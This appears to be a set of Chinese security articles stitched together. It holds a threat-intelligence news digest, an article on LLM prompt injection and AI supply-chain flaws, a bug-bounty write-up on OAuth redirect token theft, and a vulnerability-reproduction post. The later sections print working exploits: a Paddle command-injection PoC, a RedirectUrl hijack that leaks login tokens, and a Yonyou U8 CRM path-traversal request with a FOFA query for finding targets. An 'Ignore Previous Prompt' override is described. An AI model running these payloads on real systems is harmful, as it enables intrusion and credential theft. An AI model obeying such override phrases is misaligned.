上月末,微软将黑客组织归因于利用 Microsoft Windows Print Spooler
组件CVE-2022-38028CVSS 评分7.8)作为
0day
漏洞攻击,传播一种名为 GooseEgg 的先前未知的自定义恶意软件,以渗透乌克兰、欧洲和北美的政府、非政府、教育和交通部门机构。
今年 2
月初,协调一致的多国联合执法行动破坏了由美国和德国数百个小型办公室和家庭办公室 (SOHO) 路由器组成的僵尸网络APT28
攻击者据信利用这些路由器来隐藏其恶意活动,例如利用 CVE -2023-23397 针对感兴趣的目标。
根据Trend Micro
本周的一份报告(
https://www.trendmicro.com/en_us/research/24/e/router-roulette.html第三方犯罪代理僵尸网络可以追溯到
2016 年不仅包含Ubiquiti 的路由器,还包括其他基于 Linux 的路由器、Raspberry Pi 和虚拟专用服务器 (VPS) 。
“[僵尸网络背后的]攻击者设法将一些
EdgeRouter 机器人从 2024 年 1 月 26 日关闭的 C&C [命令与控制]服务器转移到 2024 年 2 月上旬新建立的
C&C 基础设施。”该公司表示,加上法律限制和技术挑战,无法彻底清理所有陷入困境的路由器。
![](https://mmbiz.qpic.cn/mmbiz_png/AnRWZJZfVaG9pOzTcfh4fTAJUQKGiavSJHKXGM8KewYIxHA2IiabFPozmGtiaKZDH3JnCC7jKm0XjnNh1icxnG5XLw/640?wx_fmt=png&from=appmsg "")
俄罗斯国家支持的网络威胁活动——数据盗窃、破坏性攻击、DDoS
活动和影响行动——预计也会对 APT44 等多个组织的美国、英国和欧盟等地区构成严重风险。根据 Google Cloud 子公司 Mandiant
上周发布的评估,该软件还包括 Sandworm、COLDRIVER、KillNet、APT29 和 APT28。
来自
Cloudflare 和 NETSCOUT 的数据显示,在瑞典加入北约联盟后,针对瑞典的 DDoS 攻击激增,这与芬兰 2023
年加入北约期间观察到的模式类似。
NETSCOUT表示“这些攻击的罪魁祸首可能包括黑客组织
NoName057、Anonymous Hundred、Russian Cyber
Army Team 和 KillNet。” “所有这些团体都是出于政治动机。”
与此同时,加拿大、英国和美国的政府机构发布了一份新的联合情况说明书(
https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-and-partners-release-fact-sheet-defending-ot-operations-against-ongoing-pro-russia-hacktivist以帮助保护关键基础设施组织免受明显亲俄罗斯的黑客活动分子自
2022 年起采用技术 (OT) 系统针对工业控制系统ICS和小规模运营系统发起的持续攻击。
![](https://mmbiz.qpic.cn/mmbiz_png/AnRWZJZfVaG9pOzTcfh4fTAJUQKGiavSJ9QnO7lDMbP0BNWSFektORjHicTgib7t8rIcFSAraA8bdC3pBPaWslTiag/640?wx_fmt=png&from=appmsg "")
这些机构表示:“亲俄黑客活动似乎主要局限于操纵 ICS 设备以造成滋扰影响的简单技术。” “调查发现,攻击者能够使用对不安全和配置错误的 OT 环境构成物理威胁的技术。”
这些攻击的目标包括北美和欧洲关键基础设施部门的组织,包括供水和废水系统、水坝、能源以及粮食和农业部门。
据观察黑客组织通过利用暴露在互联网的连接以及与此类环境中普遍存在的人机界面HMI相关的工厂默认密码来获得远程访问然后篡改任务关键参数关闭警报机制通过更改管理密码来锁定操作员。
缓解威胁的建议包括强化人机界面、限制
OT 系统在互联网上的暴露、使用强而独特的密码,以及对 OT 网络的所有访问实施多因素身份验证。
警报称“这些黑客活动分子试图通过人机界面HMI等软件组件利用虚拟网络计算VNC远程访问软件和默认密码来破坏模块化、暴露于互联网的工业控制系统ICS。”
**参考链接:**
https://thehackernews.com/2024/05/microsoft-outlook-flaw-exploited-by.html
![](https://mmbiz.qpic.cn/mmbiz_svg/McYMgia19V0WHlibFPFtGclHY120OMhgwDUwJeU5D8KY3nARGC1mBpGMlExuV3bibicibJqMzAHnDDlNa5SZaUeib46xSzdeKIzoJA/640?wx_fmt=svg "")
**今日安全资讯速递**
**APT事件**
Advanced Persistent Threat
奇安信
X实验室披露恶意 Android 后门可让黑客窃取手机内容
https://blog.xlab.qianxin.com/playing-possum-whats-the-wpeeper-backdoor-up-to/
黑客越来越多地滥用
Microsoft Graph API 进行隐秘恶意软件通信
https://thehackernews.com/2024/05/hackers-increasingly-abusing-microsoft.html
伊朗黑客冒充记者部署后门恶意软件
https://www.bleepingcomputer.com/news/security/iranian-hackers-pose-as-journalists-to-push-backdoor-malware/
美国国家安全局
(NSA) 和联邦调查局 (FBI) 就朝鲜黑客从可信来源欺骗电子邮件发出警报
https://thehackernews.com/2024/05/nsa-fbi-alert-on-n-korean-hackers.html
针对思科防火墙的
ArcaneDoor 间谍活动
https://www.securityweek.com/arcanedoor-espionage-campaign-targeting-cisco-firewalls-linked-to-china/
电子邮件安全漏洞是朝鲜社会工程攻击的最新途径
https://www.securityweek.com/us-says-north-korean-hackers-exploiting-weak-dmarc-settings/
https://therecord.media/north-korea-kimsuky-hackers-dmarc-emails
被 FBI
破坏的僵尸网络仍被俄罗斯间谍和网络犯罪分子使用
https://www.securityweek.com/botnet-disrupted-by-fbi-still-used-by-russian-spies-cybercriminals/
俄罗斯黑客瞄准北美和欧洲的工业系统
https://www.securityweek.com/russian-hackers-target-industrial-systems-in-north-america-europe/
北约和欧盟谴责俄罗斯对德国和捷克的网络攻击
https://www.bleepingcomputer.com/news/security/nato-and-eu-condemn-russias-cyberattacks-against-germany-czechia/
**一般威胁事件**
General Threat Incidents
微软对所有消费者帐户实行无密码验证
https://cybernews.com/news/microsoft-passkey-accounts/
微软警告流行
Android 应用程序中存在“Dirty Stream脏流”漏洞
https://www.securityweek.com/microsoft-warns-of-dirty-stream-vulnerability-in-popular-android-apps/
研究人员发现,五分之一的
Docker Hub 存储库是恶意目的
https://cybernews.com/security/fifth-of-docker-hub-repositories-malicious/
CISA 去年向
1,750 个组织发出勒索软件漏洞警告,只有一半组织采取了行动
https://www.cybersecuritydive.com/news/cisa-ransomware-vulnerability-warnings/714951/
美国 UnitedHealth
首席执行官告诉参议院,公司向黑客支付了 2200 万美元赎金
https://www.cnbc.com/2024/05/01/unitedhealth-ceo-says-company-paid-hackers-22-million-ransom.html
Dropbox
称黑客在泄露期间获取了密码和身份验证信息
https://therecord.media/dropbox-data-breach-notification
LockBit
公布从法国戛纳医院窃取的机密数据
https://therecord.media/lockbit-ransomware-hopital-de-cannes-data-published
ZLOADER恶意软件增加了ZEUS银行木马的反分析功能
https://securityaffairs.com/162688/cyber-crime/zloader-malware-anti-analysis-feature.html
**漏洞事件**
Vulnerability Incidents
四个严重漏洞使
HPE Aruba 设备面临 RCE 攻击
https://thehackernews.com/2024/05/four-critical-vulnerabilities-expose.html
CISA
表示GitLab 的一个关键密码重置漏洞CVE-2023-7028正在被攻击利用
https://www.securityweek.com/1400-gitlab-servers-impacted-by-exploited-vulnerability/
Android
漏洞可能会在启用 VPN 终止开关的情况下泄漏 DNS 流量
https://www.bleepingcomputer.com/news/security/android-bug-can-leak-dns-traffic-with-vpn-kill-switch-enabled/
福布斯国外安全研究人员警告20个安全漏洞“对小米用户构成威胁”
https://www.forbes.com/sites/thomasbrewster/2024/05/02/xiaomi-vulnerabilities-pose-a-threat-to-all-users-researchers-warn/
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
扫码关注
会杀毒的单反狗
**讲述普通人能听懂的安全故事**

View File

@ -0,0 +1,48 @@
# 四个关键漏洞使 HPE Aruba 设备面临 RCE 攻击
船山信安 2024-05-06 00:00
HPE Aruba Networking以前称为 Aruba Networks已发布安全更新以解决影响 ArubaOS 的严重缺陷,这些缺陷可能导致受影响系统上的远程代码执行 RCE
 10 个安全缺陷中,有 4 个严重程度被评为严重性严重 -
- CVE-2024-26304CVSS 评分9.8 - 通过 PAPI 协议访问的 L2/L3 管理服务中未经身份验证的缓冲区溢出漏洞
- CVE-2024-26305CVSS 评分9.8 - 通过 PAPI 协议访问的实用程序守护程序中未经身份验证的缓冲区溢出漏洞
- CVE-2024-33511CVSS 评分9.8 - 通过 PAPI 协议访问的自动报告服务中存在未经身份验证的缓冲区溢出漏洞
- CVE-2024-33512CVSS 评分9.8 - 通过 PAPI 协议访问的本地用户身份验证数据库中未经身份验证的缓冲区溢出漏洞
威胁参与者可以通过发送发往进程应用程序编程接口 PAPI UDP 端口 8211 的特制数据包来利用上述缓冲区溢出错误,从而获得在底层操作系统上以特权用户身份执行任意代码的能力。
这些漏洞会影响 Mobility Conductor以前称为 Mobility Master、Mobility Controllers 以及由 Aruba Central 管理的 WLAN 网关和 SD-WAN 网关,这些漏洞存在于以下软件版本中:
- ArubaOS 10.5.1.0 及更低版本
- ArubaOS 10.4.1.0 及更低版本
- ArubaOS 8.11.2.1 及更低版本,以及
- ArubaOS 8.10.0.10 及更低版本
它们还会影响已达到维护结束状态的 ArubaOS 和 SD-WAN 软件版本 -
- ArubaOS 10.3.x.x
- ArubaOS 8.9.x.x 操作系统
- ArubaOS 8.8.x.x 操作系统
- ArubaOS 8.7.x.x
- ArubaOS 8.6.x.x
- ArubaOS 6.5.4.x
- SD-WAN 8.7.0.0-2.3.0.x 和
- SD-广域网 8.6.0.4-2.2.x.x
一位名叫 Chancen 的安全研究人员发现并报告了 10 个问题中的 7 个,包括 4 个关键的缓冲区溢出漏洞。
建议用户应用最新的修复程序来缓解潜在威胁。作为 ArubaOS 8.x 的临时解决方法该公司建议用户使用非默认密钥启用增强型 PAPI 安全功能。
来源:【黑客新闻】

View File

@ -0,0 +1,235 @@
# 大语言语言模型安全攻击以及AI供应链漏洞
渊龙Sec安全团队 2024-11-15 11:28
**01**
**简要说明**
人工智能和人工智能的安全性正在以惊人的速度发展AI模型供应链中使用的工具用于构建机器学习模型会使AI应用程序容易受到独特的安全威胁。
这些工具是开源的,这意味着它们开箱即用时可能存在漏洞,这些漏洞可直接导致完整的系统接管,例如未经身份验证的远程代码执行或本地文件包含。这意味着什么?您可能面临模型、数据和凭据被盗的风险。
大语言模型因其出色的文本理解和生成能力,被广泛应用于自然语言处理领域并取得了显著成果,为社会各界带来了巨大的便利。然而,大语言模型自身仍存在明显的安全问题,严重影响其应用的可信性与可靠性,是安全学者需广泛关注的问题。
此专题主要目的为拓宽AI与AI供应链安全相关知识以下内容均为参考论文、博客拓宽知识面提升对安全认知的宽度。
**02**
技术背景
美国人工智能研究实验室 OpenAI 开发出一种可能会改变人类历史的人工智能技术驱动的自然语言处理工具,一种划时代的产物 ChatGPTChatGPT 是AI 技术进展的成果已经获得了代码的理解能力潜在地获得了复杂推理的能力可以和人类的常识、认知、需求、价值观保持一致ChatGPT 在大量的网络文本数据上进行训练。
它的知识和语言表达能力比其他 AI 机器人更加丰富,并且拥有更强的自然语言处理能力,能够理解复杂的语言结构,回答各种类型的问题,知识范围更广更智能,回答更加精确,可以根据用户的语境和问题进行上下文理解,还可以撰写邮件、视频脚本、文案、翻译、代码等任务。
**03**
大语言模型LLM的提示注入攻击
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLhYNiaaJSrTNkreV2fhFfIAqQ1N91tSDbncBB1nicXTIC7x9jBO9LR1dg/640?wx_fmt=png&from=appmsg "")
使用“IgnorePrevious
Prompt”命令来指导 LLM 无视之前的指令,这可能被用来绕过内容审查、生成恶意内容。
提示注入攻击主要利用 LLM 在处理文本时常常难以区分系统指令和用户输入的缺陷,这种界限的模糊可能导致恶意指令的成功注入。
LLM 在生成文本时依赖于对自然语言的识别和处理,然而在自然语言中系统指令和用户输入提示词往往混合在一起,缺乏清晰的界限。由于这种模糊性LLM有可能将系统指令和用户输入统一当作指令来处理,缺乏对提示词进行严格验证的机制,从而因受到恶意指令的干扰而输出具有危害性的内容。
**04**
大语言模型LLM的幻觉问题
大语言模型的幻觉问题指模型在处理输入任务、维持输出语境连贯性以及与现实世界事实保持一致性时存在偏差或错误。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLHjePnHvGDwGMlzDcNQsz6DdJykcqzNSZfJYz2WUjDnxvrNeZym6prQ/640?wx_fmt=png&from=appmsg "")
如图所示,大模型的幻觉问题可归结为3种主要表现形式:
)回答与输入任务不匹配,即模型生成的回答与用户输入的任务不相关;
)回答内容语境不一致,即模型生成的回答前后矛盾;
)回答与既定事实相违背,即模型生成的回答与现实世界的可验证事实存在冲突。
这些幻觉问题影响了大模型的可靠性,并限制了大模型的应用范围,尤其是在关键领域如医疗和金融。
**05**
大语言模型LLM的提示词泄露
提示词泄露将导致本属于应用开发者的系统提示词被其他竞争对手用于获利,而为用户定制的提示词被泄露可能导致用户隐私信息被泄露。提示词泄露亦有可能增强其他针对大模型的攻击,例如攻击者可基于被泄露的系统提示词,针对性优化提示词注入攻击的载荷,从而更好地绕过系统提示词 为大模型添加的安全措施。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLCUdCyMwwVMAIjLwhvqfx2pxrbQV50bI9B9Y6faZAle7tC0EzPJfrSA/640?wx_fmt=png&from=appmsg "")
上图给出了泄露大模型应用的系统提示词,攻击者可向应用发送专门构造的攻击载荷,这些攻击载荷使得大模型忽略提示词的要求,转而执行复述操作,将该应用的提示词返回给攻击者。
**06**
不**安全特性可被利用于AI供应链攻击**
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLzz5jbTibRzpnm5qrv1SxSibGib2wvJF5ssb6nYVL6q3lZPnDny4a61UIA/640?wx_fmt=png&from=appmsg "")
腾讯朱雀实验室在对datasets等AI开源组件进行安全研究时发现开发者通常会使用datasets组件的load_dataset函数加载数据集为了考虑支持更复杂的数据处理格式或流程当加载的数据集下包含有与数据集同名的Python脚本时将会默认运行该脚本。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLeLay3ibYibsDj3hEsYmcZ0KEUfsXdIlS2Q7xeVc4LBaogcVa790GsRKg/640?wx_fmt=png&from=appmsg "")
由于Hugging Face平台上的数据集都由用户上传如果数据集中的Python脚本包含恶意行为那么会造成严重的安全风险如下图所示攻击者构造的恶意脚本会主动连接攻击者服务器并等待攻击者下发执行系统命令最终窃取受害者服务器上的敏感数据。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLnMqEOol8xSJOHBJQN2WAqaYkPBXdQGOBML9yTfonkNRh53dTCswzgA/640?wx_fmt=png&from=appmsg "")
利用该特性攻击者可通过在Hugging Face、Github及其他渠道分发包含恶意后门代码的数据集当开发者通过datasets组件加载恶意数据集进行训练或微调时数据集里的恶意后门代码将会运行从而导致AI模型、数据集、代码被盗或被恶意篡改。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLicMVYts48gYTInSCo1De3SibtwDnLxmymicjM42Ax7alCWia6epJx68Bjw/640?wx_fmt=png&from=appmsg "")
作为AI领域的基础库datasets拥有很大的下载量根据pypistats网站统计最近一天下载量将近10万。一旦有恶意数据集在网络上被大范围传播与使用将会有大量开发者遭受这种供应链后门投毒攻击。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLSzkHFZcoYdADAMPo3t8fp9f4gibjribxTp2zIX1tjRY2Pian1atDsgS4w/640?wx_fmt=png&from=appmsg "")
**06**
AI供应链漏洞CVE-2024-0521
PaddlePaddle作为中国首个自主研发的深度学习平台自2016年起正式开源给专业社区。它是一个拥有先进技术和丰富功能的工业平台涵盖核心深度学习框架、基本模型库、端到端开发套件、工具和组件以及服务平台。PaddlePaddle起源于工业实践致力于工业化。它已被制造业、农业、企业服务业等广泛采用同时为超过 1070 万开发人员、235,000 家公司和 860,000 个模型提供服务。凭借这些优势PaddlePaddle已经帮助越来越多的合作伙伴将AI商业化。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLTsKlOn8zMRdRPtFPCQryVUQEe9I1Kmse2UPGPmGuhXOVbvQoc5ic7Yg/640?wx_fmt=png&from=appmsg "")
受影响的代码:```
def _wget_download(url, fullname):
# using wget to download url
tmp_fullname = fullname + "_tmp"
# user-agent
command = f'wget -O {tmp_fullname} -t {DOWNLOAD_RETRY_LIMIT} {url}'
subprc = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
```
该漏洞源于 url 参数在未经适当验证或清理的情况下合并到命令字符串中的方式。如果 url 是从不受信任的来源构建的,则攻击者可能会注入恶意命令。
POC验证
```
from paddle import utils
utils.download._wget_download("aa; touch codexecution", "bb")
```
然后将执行以下命令: 
```
wget -O bb_tmp -t 3 aa; touch codexecutioncodeexecution
```
利用此漏洞的攻击者可以使用运行代码的进程的权限在主机系统上执行任意命令。根据使用此代码的上下文,这可能会导致未经授权的访问、数据丢失或其他潜在的有害后果。
修复patch
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjLCNZLPOaLZlM0m6ictBvvtC8pZm5OJu4gSKTtHcCzTNkTKILFk3biaMag/640?wx_fmt=png&from=appmsg "")
**05**
AI供应链漏洞CVE-2023-6778
ClearML 是一个开源平台之前叫TRAINS可为全球数千个数据科学团队自动化并简化机器学习解决方案的开发和管理。
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLbnhbhvBSxAFvgZSibyhYjL2UprJnH8fcaEqqaibHhetV0KNZmw9FP49MIct9gDCgE2LmYlcxa3INA/640?wx_fmt=png&from=appmsg "")
“项目描述”和“报告”部分中使用的 Markdown 编辑器组件未应用适当的数据清
理。
当未经筛选的数据传递到此组件时,它允许注入恶意 XSS 有效负载。
具体而言,此漏
洞存在于“项目描述”和“报告”部分中,使其容易受到存储的 XSS 攻击。
在项目描述的情况下,在创建项目并输入其名称和描述后,在概述中,项目描述直接传递到文件中的这一行
/app/webapp-common/project-info/project-info.component.ts
```
this.info = project.description;
```
然后
在这里
渲染:
```
<sm-markdown-editor
#editor
*ngIf="!loading"
[class.editor]="editor.editMode"
[data]="info"
[readOnly]="example"
(saveInfo)="saveInfo($event)"
>
<div no-data class="flex-middle overview-placeholder" *ngIf="!example">
<i class="icon i-markdown xxl"></i>
<div class="no-data-title">THERES NOTHING HERE YET…</div>
<button (click)="editor.editClicked()" class="no-data-button btn btn-neon">
<span>ADD PROJECT OVERVIEW</span>
</button>
</div>
</sm-markdown-editor>
</div>
```
以下视频演示了如何成功利用此漏洞,重点介绍如何生成应用凭据:
此漏洞具有重大的安全隐患,因为它可能导致用户帐户泄露和操纵应用程序中的各种关键功能。此漏洞的潜在影响包括:
1.用户配置文件操作:攻击者可以利用存储的 XSS 修改应用程序内用户的配置文件名称。这可能会导致冒充、身份盗用和用户混淆。
2.项目删除:通过使用 XSS 有效负载,攻击者可以强制受害者删除其项目,从而可能导致数据丢失和应用程序功能中断。
3.应用凭据滥用(在 POC 视频中演示):此漏洞的最严重后果是能够使用受害者的帐户生成应用凭据。应用程序凭据通常在应用程序中具有重要权限,允许用户执行各种管理操作。
使用泄露的应用凭据,攻击者可以:- 创建管道,这可能会导致未经授权的数据处理。
- 连接 ClearML 代理,可能会损害机器学习操作的完整性。
- 删除模型,导致潜在的数据丢失和系统中断。
- 以与受害者相同级别的权限执行其他操作,从而破坏应用程序的整体安全性和稳定性。
转载翻译汇总文献图片来源:
[1]huntr - 世界上第一个用于 AI/ML 的漏洞赏金平台https://huntr.com/
[2]Protect AI | Homehttps://protectai.com/
[3]赵月,何锦雯,朱申辰等.大语言模型安全现状与挑战[J].计算机科学,2024,51(01):68-71.
[4]警惕Hugging Face开源组件风险被利用于大模型供应链攻击 - 腾讯安全应急响应中心 (tencent.com) 
**学习安全五年+,挖洞、传统攻防、安全科研,欢迎扫码了解,有学生优惠**
![](https://mmbiz.qpic.cn/mmbiz_png/TvvmibSlOcicLy1EWYAFAibpTONG0gcEyaWMOk3L4ut5Q6gL6jpGKBRfGtWo2doEoTkEXCHSxiatGRue51WWIics4bQ/640?wx_fmt=png "")

View File

@ -0,0 +1,91 @@
# 漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞
p喵呜 迪哥讲事 2024-05-05 20:32
# 0x00 前言
文章中的项目地址统一修改为: test.com 保护厂商也保护自己
# 0x01 前期准备
```
测试微博
测试微博账号182******77
注:此微博已绑定厂商账号
```
```
测试厂商账号182******77
注:测试微博绑定的就是此账号
```
# 0x02 攻击开始
官网: https://passport.test.com
![](https://mmbiz.qpic.cn/mmbiz_png/YmmVSe19Qj61xszlel8t3d0bZeLicV8EEutld5maQFI7aG2HTXrYlmjl1dMn6fAEQkKjdgNGDH0KBGhzc8icn4DA/640?wx_fmt=png&from=appmsg "")
攻击url: https://passport.test.com/Union/WeiBo?RedirectUrl=http://baidu.com  
然后将此url发给受害者,受害者打开
劫持到的内容: https://www.baidu.com/?ST=NmQxZGU2ZjMtNDk3Ny00YzJhLWI2YjAtYTJjMWI2YWIyYTkx
![](https://mmbiz.qpic.cn/mmbiz_png/YmmVSe19Qj61xszlel8t3d0bZeLicV8EECpicjCTsJLGnwZ4nG2jMCoGLcW967bFEwicSqTKfJ7CbH4aHSPBfdDyw/640?wx_fmt=png&from=appmsg "")
ST = 用户登录凭证,然后将此凭证拼接任意目标站点即可登录
换浏览器打开:http://my.test.com?ST=NmQxZGU2ZjMtNDk3Ny00YzJhLWI2YjAtYTJjMWI2YWIyYTkx
![](https://mmbiz.qpic.cn/mmbiz_jpg/YmmVSe19Qj61xszlel8t3d0bZeLicV8EEGmBIPGgIH60TzfbjG5tjibrIMvdicrPrIwCQNs3qQeD4iaGtjksia5Wqmg/640?wx_fmt=other&from=appmsg "")
成功登录此用户
看不懂的文末有彩蛋
如果你是一个长期主义者欢迎加入我的知识星球我们一起往前走每日都会更新精细化运营微信识别二维码付费即可加入如不满意72 小时内可在 App 内无条件自助退款前面有同学问我有没优惠券这里发放100张100元的优惠券,用完今年不再发放
![](https://mmbiz.qpic.cn/mmbiz_png/YmmVSe19Qj7N5nMaJbtnMPVw96ZcVbWfp6SGDicUaGZyrWOM67xP8Ot3ftyqOybMqbj1005WvMNbDJO0hOWkCaQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/YmmVSe19Qj5jYW8icFkojHqg2WTWTjAnvcuF7qGrj3JLz1VgSFDDMOx0DbKjsia5ibMpeISsibYJ0ib1d2glMk2hySA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
## 往期回顾
[](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247486912&idx=1&sn=8704ce12dedf32923c6af49f1b139470&chksm=e8a607a3dfd18eb5abc302a40da024dbd6ada779267e31c20a0fe7bbc75a5947f19ba43db9c7&scene=21#wechat_redirect)
[dom-xss精选文章](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247488819&idx=1&sn=5141f88f3e70b9c97e63a4b68689bf6e&chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&scene=21#wechat_redirect)
[年度精选文章](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247487187&idx=1&sn=622438ee6492e4c639ebd8500384ab2f&chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247487187&idx=1&sn=622438ee6492e4c639ebd8500384ab2f&chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&scene=21#wechat_redirect)
[Nuclei权威指南-如何躺赚](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247487122&idx=1&sn=32459310408d126aa43240673b8b0846&chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&scene=21#wechat_redirect)
[漏洞赏金猎人系列-如何测试设置功能IV](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247486973&idx=1&sn=6ec419db11ff93d30aa2fbc04d8dbab6&chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&scene=21#wechat_redirect)
[漏洞赏金猎人系列-如何测试注册功能以及相关Tips](http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247486764&idx=1&sn=9f78d4c937675d76fb94de20effdeb78&chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&scene=21#wechat_redirect)
有的人可能看不懂其实这个漏洞逻辑也很简单就是将RedirectUrl这个参数后面的url改为你自己的域名只要受害者点击了RedirectUrl改变之后的url,你就可以在网站日志里面查看到相对应的token/code攻击者就可以利用泄露的token/code实现账户劫持原因主要在于开发者并未对RedirectUrl做严格的过滤
原文:https://www.yuque.com/pmiaowu/web_security_1/obtg20

View File

@ -0,0 +1,70 @@
# 用友crm客户关系管理pub/downloadfile.php接口存在任意文件读取漏洞
南风徐来 南风漏洞复现文库 2024-05-05 23:20
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
## 1. 用友crm客户关系管理简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践更符合中国企业营销管理特点客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验目标是帮助企业有效获取商机、提升营销能力。
## 2.漏洞描述
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践更符合中国企业营销管理特点客户关系管理的整合营销平台。用友crm pub/downloadfile.php接口存在任意文件读取漏洞
CVE编号:
CNNVD编号:
CNVD编号:
## 3.影响版本
用友U8 CRM
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nLPCED5vN7mULE3ibZmCCib2tC9abrAKAkibrPHrGfib6zbtYbSfMic2CjY6w/640?wx_fmt=jpeg&from=appmsg "null")
用友crm客户关系管理pub/downloadfile.php接口存在任意文件读取漏洞
## 4.fofa查询语句
app="用友U8CRM"
## 5.漏洞复现
漏洞链接http://127.0.0.1/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini
漏洞数据包:
```
GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nL9S6OsDVQAnNrMPj7dGXGURzHnMlmdIyb1oGdmEvwMp03rMCqH0Mk7Q/640?wx_fmt=jpeg&from=appmsg "null")
## 6.POC&EXP
本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球南风网络安全1: 更新poc批量扫描软件承诺一周更新8-14个插件吧我会优先写使用量比较大程序漏洞。2: 免登录免费fofa查询。3: 更新其他实用网络安全工具项目。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nLqwUfhon6VEWPJhDkqRwPZISBCm7dnlvXlP3icmicmsApiaMU2xZgQssibg/640?wx_fmt=jpeg&from=appmsg "null")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nL3cXHd9iaK0AjFlUnGdl5tLxgyicConjR5oFmDqOyaYyvlibQIsMZGdibVg/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nLM9fgh9iavunltCKAOxPdUHaefAaWkibkgwkzG4tOwcGzJxUurVJLXVTA/640?wx_fmt=jpeg&from=appmsg "null")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nL0abPicn8eCc9KQgEwT7U86sxKB07Q1gkic22YmjTURxBJ8BKZoY8GQmQ/640?wx_fmt=jpeg&from=appmsg "null")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nLBY8nGxB98YwOzzoWDbbAljI3p4ay6YKDLgHibd4IgXeH7XKO0z92d7Q/640?wx_fmt=jpeg&from=appmsg "null")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/HsJDm7fvc3YicjgtsjRkxic8PODKtkk6nLnWpwUFnAuL9pHib4LRADwDMetDPGUHo5ps7tgVcoWSkj4pV3dpBGFCA/640?wx_fmt=jpeg&from=appmsg "null")
## 7.整改意见
打补丁
## 8.往期回顾
[用友政务财务系统FileDownload接口存在任意文件读取漏洞](http://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247486371&idx=1&sn=8ea4470a40d2100d18aecb3a4abcff6c&chksm=974b86a4a03c0fb2dad3b970bae511a25e02796d939379b41cee9a8372a421337989e1d432ef&scene=21#wechat_redirect)
